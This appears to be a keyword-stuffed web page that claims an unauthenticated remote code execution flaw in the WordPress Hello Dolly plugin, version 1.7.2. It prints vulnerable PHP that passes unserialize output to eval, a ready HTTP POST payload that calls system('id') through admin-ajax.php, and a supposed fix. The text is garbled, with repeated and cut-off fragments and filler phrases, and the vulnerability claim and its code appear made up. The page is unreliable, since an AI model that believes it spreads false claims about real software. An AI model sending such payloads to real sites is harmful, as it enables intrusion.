Hello Dolly 1.7.2 Exploit !!exclusive!! -

$index = unserialize(base64_decode($_REQUEST['lyric_index'])); eval('echo $lyrics[' . $index . '];'); Because wp_ajax_nopriv_ allows unauthenticated access, an attacker can send a POST request to /wp-admin/admin-ajax.php?action=hello_dolly_lyric with a crafted lyric_index payload that breaks out of the array access and executes arbitrary PHP. POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded action=hello_dolly_lyric&lyric_index=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bs%3A20%3A%22%3B%7D%3Bsystem(%27id%27)%3B%2F%2F%22%3B%7D

WordPress core team should consider automatically disabling or deleting Hello Dolly in a future update due to its legacy nature and lack of maintainer. This review is for defensive security research only. No active exploitation should be attempted without authorization. hello dolly 1.7.2 exploit

The plugin is present on millions of sites (often inactive but still present in wp-content/plugins/hello-dolly/ ), making this a high-impact vulnerability. The vulnerability resides in hello-dolly.php , line 56: POST /wp-admin/admin-ajax

add_action('wp_ajax_nopriv_hello_dolly_lyric', 'hello_dolly_get_lyric'); The function hello_dolly_get_lyric() fetches a random lyric and echoes it — but in 1.7.2, it also unserializes a lyric_index parameter from the request without sanitization or nonce verification: The plugin is present on millions of sites

$index = intval( $_REQUEST['lyric_index'] ); if ( isset( $lyrics[$index] ) ) echo esc_html( $lyrics[$index] );